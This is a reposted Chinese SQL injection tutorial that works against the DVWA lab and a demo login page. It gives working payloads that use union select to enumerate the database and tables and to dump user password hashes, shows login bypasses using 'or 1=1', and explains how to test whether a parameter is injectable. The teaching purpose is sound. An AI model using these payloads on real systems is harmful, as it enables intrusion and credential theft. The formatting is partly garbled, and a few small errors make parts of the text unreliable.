一、Sql注入简介

Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。

二、Web 程序三层架构

三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为:

  • 界面层(User Interface layer)
  • 业务逻辑层(Business Logic Layer)
  • 数据访问层(Data access layer)。

区分层次的目的即为了“高内聚低耦合”的思想。在软件体系架构设计中,分层式结构是最常见,也是最重要的一种结构被应用于众多类型的软件开发。
由数据库驱动的Web应用程序依从三层架构的思想也分为了三层:

  • 表示层。
  • 业务逻辑层(又称领域层)
  • 数据访问层(又称存储层)

拓扑结构如下图所示
img
在上图中,用户访问实验楼主页进行了如下过程:

  • 在 Web 浏览器中输入 www.shiyanlou.com 连接到实验楼服务器。
  • 业务逻辑层的 Web 服务器从本地存储中加载 index.php 脚本并解析。
  • 脚本连接位于数据访问层的 DBMS(数据库管理系统),并执行 Sql 语句。
  • 数据访问层的数据库管理系统返回 Sql 语句执行结果给 Web 服务器。
  • 业务逻辑层的 Web 服务器将 Web 页面封装成 HTML 格式发送给表示层的 Web 浏览器。
  • 表示层的 Web 浏览器解析 HTML 文件,将内容展示给用户。

在三层架构中,所有通信都必须要经过中间层,简单地说,三层架构是一种线性关系

三、Sql 注入漏洞详解

3.1 Sql 注入产生原因及威胁:

刚刚讲过当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。
Sql 注入带来的威胁主要有如下几点

  • 猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
  • 绕过认证,列如绕过验证登录网站后台。
  • 注入可以借助数据库的存储过程进行提权等操作

    3.2 Sql 注入示例一.猜解数据库

    接下来我们通过一个实例,让你更加清楚的理解 Sql 注入猜解数据库是如何发生的。
    使用DVWA渗透测试平台,作为攻击测试的目标:
    img
    先输入 1 ,查看回显 (URL中ID=1,说明php页面通过get方法传递参数):
    img
    那实际上后台执行了什么样的Sql语句呢?点击 view source查看源代码 ,其中的SQL查询代码为:
    img
    可以看到,实际执行的Sql语句是: ``` SELECT first_name, last_name FROM users WHERE user_id = ‘1’;
  1. 我们是通过控制参数Id的值来返回我们需要的信息。<br />
  2. 如果我们不按常理出牌,比如在输入框中输入 `1' order by 1#`<br />
  3. 实际执行的Sql语句就会变成:

SELECT first_name, last_name FROM users WHERE user_id = ‘1’ order by 1#`;(按照Mysql语法,#后面会被注释掉,使用这种方法屏蔽掉后面的单引号,避免语法错误)

  1. 这条语句的意思是查询users表中user_id1的数据并按第一字段排行。<br />输入 `1' order by 1#` `1' order by 2#`时都返回正常:<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-a34bf774595fbb48.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/659/format/webp)<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-a7c16d9dbf698edb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/662/format/webp)<br />当输入 `1' order by 3#`时,返回错误:<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-256a7d9b495a0587.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/669/format/webp)<br />**由此可知,users表中只有两个字段,数据为两列。**<br />**接下来我们使用 `union select`联合查询继续获取信息。**<br />
  2. union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示,即执行联合查询。需要注意在使用 union 查询的时候需要和主查询的列数相同,而我们之前已经知道了主查询列数为 2,接下来就好办了。<br />
  3. 输入`1' union select database(),user()#`进行查询 
  5. - database()将会返回当前网站所使用的数据库名字.
  6. - user()将会返回执行当前查询的用户名.
  8. 实际执行的Sql语句是 :

SELECT first_name, last_name FROM users WHERE user_id = ‘1’ union select database(),user()#`;

  1. ![img](https:////upload-images.jianshu.io/upload_images/6230889-e0203460ff81821b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/662/format/webp)<br />通过上图返回信息,我们成功获取到:
  3. - 当前网站使用数据库为 dvwa .
  4. - 当前执行查询用户名为 root[localhost ](/localhost ) . 
  6. 同理我们再输入 `1' union select version(),@@version_compile_os#`进行查询:
  8. - version() 获取当前数据库版本.
  9. - @[version_compile_os ](/version_compile_os ) 获取当前操作系统。 
  11. 实际执行的Sql语句是:

SELECT first_name, last_name FROM users WHERE user_id = ‘1’ union select version(),@@version_compile_os#`;

  1. ![img](https:////upload-images.jianshu.io/upload_images/6230889-9ba5c1a172be5cca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/663/format/webp)<br />通过上图返回信息,我们又成功获取到:
  3. - 当前数据库版本为 : 5.6.31-0ubuntu0.15.10.1.
  4. - 当前操作系统为 : debian-linux-gnu
  6. 接下来我们尝试获取 dvwa 数据库中的表名。<br />
  7. `information_schema`  mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name  table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。<br />我们输入`1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`进行查询:<br />
  8. 实际执行的Sql语句是:

SELECT first_name, last_name FROM users WHERE user_id = ‘1’ union select table_name,table_schema from information_schema.tables where table_schema= ‘dvwa’#`;

  1. ![img](https:////upload-images.jianshu.io/upload_images/6230889-d00a04753ea91a27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/659/format/webp)<br />通过上图返回信息,我们再获取到:
  3. - dvwa 数据库有两个数据表,分别是 guestbook  users .
  5. **有些同学肯定还不满足目前获取到的信息,那么我们接下来尝试获取重量级的用户名、密码。**<br />
  6. 由经验我们可以大胆猜测users表的字段为 user  password ,所以输入:`1' union select user,password from users#`进行查询:<br />
  7. 实际执行的 Sql 语句是:

SELECT first_name, last_name FROM users WHERE user_id = ‘1’ union select user,password from users#`;

  1. ![img](https:////upload-images.jianshu.io/upload_images/6230889-c251e699ff9a9396.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/662/format/webp)<br />可以看到成功爆出用户名、密码,密码采用 md5 进行加密,可以到`www.cmd5.com`进行解密。<br />
  2. 直此,同学们应该已经对 Sql 注入有了一个大概得了解,也清楚了 Sql 注入的强大。
  3. ### 4.3 Sql 注入实例二.验证绕过
  4. 接下来我们再试试另一个利用 **Sql 漏洞绕过登录验证**的实例。<br />
  5. 使用事先编写好的页面,这是一个普通的登录页面,只要输入正确的用户名和密码就能登录成功。<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-f28e32057ec5a979.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/501/format/webp)<br />我们先尝试随意输入用户名 123 和密码 123 登录:<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-8b4414ab9fe44cc2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/503/format/webp)<br />从错误页面中我们无法获取到任何信息。<br />
  6. 看看后台代码如何做验证的:<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-156009a2bc7e79d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/670/format/webp)<br />s<br />实际执行的操作时:

select * from users where username=’123’ and password=’123’

  1. 当查询到数据表中存在同时满足 username  password 字段时,会返回登录成功。<br />
  2. 按照第一个实例的思路,我们尝试在用户名中输入 `123' or 1=1 #`, 密码同样输入 `123' or 1=1 #` :<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-f9bfece283965162.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/503/format/webp)<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-c1be76d1c05814fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/501/format/webp)<br />为什么能够成功登陆呢?因为实际执行的语句是:

select * from users where username=’123’ or 1=1 #’ and password=’123’ or 1=1 #’

  1. 按照 Mysql 语法,# 后面的内容会被忽略,所以以上语句等同于(实际上密码框里不输入任何东西也一样):

select * from users where username=’123’ or 1=1 

  1. 由于判断语句 or 1=1 恒成立,所以结果当然返回真,成功登录。<br />
  2. 我们再尝试不使用 # 屏蔽单引号,采用手动闭合的方式:<br />
  3. 我们尝试在用户名中输入 `123' or '1'='1`, 密码同样输入 `123' or '1'='1` (不能少了单引号,否则会有语法错误):<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-495493937cc9c2a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/500/format/webp)<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-054d517a8c7d0267.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/502/format/webp)<br />实际执行的 Sql 语句是:

select * from users where username=’123’ or ‘1’=’1’ and password=’123’ or ‘1’=’1

  1. 看到了吗?两个 or 语句使 and 前后两个判断永远恒等于真,所以能够成功登录。<br />还有很多其他 Mysql 语句可以巧妙的绕过验证,同学们可以发散自己的思维进行尝试。
  2. ## 四、判断 Sql 注入点
  3. 通常情况下,可能存在 Sql 注入漏洞的 Url 是类似这种形式 `http://xxx.xxx.xxx/abcd.php?id=XX`<br />
  4.  Sql 注入的判断,主要有两个方面:
  6. - 判断该带参数的 Url 是否存在 Sql 注入?
  7. - 如果存在 Sql 注入,那么属于哪种 Sql 注入?
  9. 可能存在 Sql 注入攻击的 ASP/PHP/JSP 动态网页中,一个动态网页中可能只有一个参数,有时可能有多个参数。有时是整型参数,有时是字符串型参数,不能一概而论。总之只要是带有参数的 动态网页且此网页访问了数据库,那么就有可能存在 Sql 注入。如果程序员没有足够的安全意识,没有进行必要的字符过滤,存在SQL注入的可能性就非常大。
  10. ### 4.1 判断是否存在 Sql 注入漏洞
  11. 最为经典的**单引号判断法**:<br />
  12. 在参数后面加上单引号,比如:

http://xxx/abc.php?id=1

  1. 如果页面返回错误,则存在 Sql 注入。<br />
  2. 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。<br />
  3. (如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入,因为此为入门基础课程,就不做深入讲解了)
  4. ### 4.2 判断 Sql 注入漏洞的类型
  5. 通常 Sql 注入漏洞分为 2 种类型:
  7. - 数字型
  8. - 字符型
  10. 其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分**常用**的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类型。<br />![img](https:////upload-images.jianshu.io/upload_images/6230889-531a0fb18b2eb4ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/900/format/webp)
  11. #### 4.2.1 数字型判断:
  12. 当输入的参 x 为整型时,通常 abc.php  Sql 语句类型大致如下:<br />
  13. `select * from <表名> where id = x`<br />
  14. 这种类型可以使用经典的 `and 1=1`  `and 1=2` 来判断:
  16. - 
  17. 1. Url 地址中输入 `http://xxx/abc.php?id= x and 1=1` 页面依旧运行正常,继续进行下一步。
  20. - 
  21. 1. Url 地址中继续输入 `http://xxx/abc.php?id= x and 1=2` 页面运行错误,则说明此 Sql 注入为数字型注入。
  25. 原因如下:<br />
  26. 当输入 `and 1=1`时,后台执行 Sql 语句:

select * from <表名> where id = x and 1=1 

  1. 没有语法错误且逻辑判断为正确,所以返回正常。<br />当输入 `and 1=2`时,后台执行 Sql 语句:

select * from <表名> where id = x and 1=2

  1. 没有语法错误但是逻辑判断为假,所以返回错误。<br />
  2. 我们再使用假设法:如果这是字符型注入的话,我们输入以上语句之后应该出现如下情况:

select from <表名> where id = ‘x and 1=1’ select from <表名> where id = ‘x and 1=2’ 

  1. 查询语句将 and 语句全部转换为了字符串,并没有进行 and 的逻辑判断,所以不会出现以上结果,故假设是不成立的。
  2. #### 4.2.2 字符型判断:
  3. 当输入的参 x 为字符型时,通常 abc.php  SQL 语句类型大致如下:<br />
  4. `select * from <表名> where id = 'x'`<br />
  5. 这种类型我们同样可以使用 `and '1'='1`  `and '1'='2`来判断:
  7. - 
  8. 1. Url 地址中输入 `http://xxx/abc.php?id= x' and '1'='1` 页面运行正常,继续进行下一步。
  11. - 
  12. 1. Url 地址中继续输入 `http://xxx/abc.php?id= x' and '1'='2` 页面运行错误,则说明此 Sql 注入为字符型注入。
  16. 原因如下:<br />
  17. 当输入 `and '1'='1`时,后台执行 Sql 语句:

select * from <表名> where id = ‘x’ and ‘1’=’1’

  1. 语法正确,逻辑判断正确,所以返回正确。<br />当输入  `and '1'='2`时,后台执行 Sql 语句:

select * from <表名> where id = ‘x’ and ‘1’=’2’

``` 语法正确,但逻辑判断错误,所以返回正确。同学们同样可以使用假设法来验证。

本文转载自:

作者:Jewel591
原文链接:https://www.jianshu.com/p/078df7a35671